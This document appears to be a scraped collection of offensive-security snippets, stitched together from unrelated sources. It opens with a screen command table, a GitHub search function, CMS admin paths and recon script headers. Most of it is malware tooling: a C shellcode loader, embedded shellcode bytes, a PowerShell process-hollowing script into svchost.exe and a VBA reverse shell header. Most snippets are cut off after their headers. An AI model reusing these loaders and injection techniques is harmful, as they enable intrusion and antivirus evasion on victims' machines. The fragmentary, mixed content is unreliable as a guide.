| Description | Command |
|---|---|
| Start a new session with session name | `screen -S <session_name>` |
| List running sessions / screens | `screen -ls` |
| Attach to a running session | `screen -x` |
| Attach to a running session with name | `screen -r` |
```sh
#!/bin/sh
# func to do the search w/ curl
# syntax `perform_search anti-fur_APIKEY gh_APIKEYAPIKEYAPIKEY`
perform_search() {
    local search_term="$1"
    local api_key="$2"
    curl -s -H "Authorization: token $api_key" "https://api.github.com/search/repositories?q=$search_term" | jq '.items[].html_url'
}
```
```text
WordPress: /wp-admin
Drupal: /admin
Joomla: /administrator
Magento: /admin
Concrete5: /dashboard
SilverStripe: /admin
Textpattern: /textpattern
MODX: /manager
Radiant CMS: /admin
Contao: /contao
```
```python
#!/usr/bin/env python3
'''
Greetings bug-slaying brothers of the pythonian blood. This script takes my httpx output after slamming in a bunch of subdomains
and organizes it so it's a bit easier to read and work with.
The HTTPX payload I use first is:
httpx -sc -cl -title -bp -server -td -ip -cname -asn -cdn -vhost -fhr | anew httpx-quicc
This script will organize the data by status code and then from smallest to largest for each status code
```
```python
#!/usr/bin/env python3
'''
Get the excellent GoLinkFinder tool via github.com/0xsha/GoLinkFinder
... based on my boy here: https://github.com/GerbenJavado/LinkFinder
Anyways, this gives an excellent clean and parsed output after running GoLinkFinder on a gang of urls.
use this like:
python3 golinkfinderx.py urls.txt
'''
```
```c
// Saumyajeet Das
// Written/Compiled: Visual Studio 2022
// Usage: midiOutOpen.exe <shellcode file>
#pragma comment(lib, "winmm.lib")
#include <stdio.h>
#include <Windows.h>
#include <mmsystem.h>
BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);
```
```c
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
    0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
```
```powershell
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.
```
```vb
' ********************************************************************************************************
'
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources:
'
' * https://stackoverflow.com/questions/8670391
' * https://stackoverflow.com/questions/43197814
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/
'
' The code demonstrates more complex usage example for calling Win32 API from VBA and should be used
' for educational purpose only. During development I was mainly interested whether the WSAData or the
```
```python
#!/usr/bin/env python3
import re
import sys
import argparse


class Xor:
    '''
    Helper class for performing xor operations.
```